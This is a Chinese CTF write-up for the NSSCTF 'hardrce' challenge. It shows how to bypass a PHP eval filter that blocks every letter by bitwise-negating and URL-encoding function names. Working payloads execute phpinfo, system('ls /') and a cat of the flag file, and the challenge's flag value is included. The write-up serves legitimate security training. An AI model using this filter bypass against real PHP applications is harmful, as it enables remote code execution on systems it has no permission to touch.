NSSCTF[SWPUCTF 2021 新生赛]hardrce(无字母RCE)

113 篇文章 18 订阅
56 篇文章 1 订阅

代码审计:

使用get方式请求给wllm传参

使用preg_match函数正则匹配过滤掉了一些符号

'\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`'

以及 [a-zA-Z] 即所有的大小写字母

如果传入内容满足这些条件则会执行eval函数

URL编码取反绕过正则实现RCE:

直接传入肯定不行

此时我们可以对需要使用的函数进行取反,然后再进行URL 编码;

在发送 payload 的时候将其取反,便可还原代码;

因为取反操作后基本上用的都是不可见字符,所以不会触发正则匹配。

对于没有参数的函数,比如phpinfo();

这里没有过滤括号和分号,所以我们对phpinfo取反编码再取反即可

使用~对phpinfo进行取反操作,再使用urlencode函数对其进行编码

得到 %8F%97%8F%96%91%99%90

构造payload:?wllm=(~%8F%97%8F%96%91%99%90)();   #phpinfo();

传入之后成功回显

注意:在使用取反编码再取反进行绕过时,想要执行我们指定的代码,传入的payload必须要满足 (函数名)() 这样的形式,否则在取反之前PHP解释器并不知道是要执行一个函数,取反之后就算是一个函数也不会被当作代码执行。

我们可以验证一下,如果将phpinfo()整体取反编码再取反,是否会执行呢?

得到%8F%97%8F%96%91%99%90%D7%D6

构造payload:?wllm=(~%8F%97%8F%96%91%99%90%D7%D6);   

按道理来说它也是 phpinfo();

但是传入之后发现代码并没有被执行

因此我们在使用这种方法的时候一定要注意满足要求的格式

接下来我们介绍有参数的函数:

同样需要满足上述要求,不同的是需要分别对其中的字符进行编码

比如我们想执行system('ls /');

分别对 system 和 ls / 进行取反、编码,输出"\n"是用来换行

得到

%8C%86%8C%8B%9A%92

%93%8C%DF%D0

再分别对它们再次进行取反操作

构造payload:?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

命令执行成功,发现存在名为flllllaaaaaaggggggg的文件

我们尝试获取它

构造payload: ?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);

拿到flag

NSSCTF{36209fa9-5341-4a17-b668-ac020cdee0e6} 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值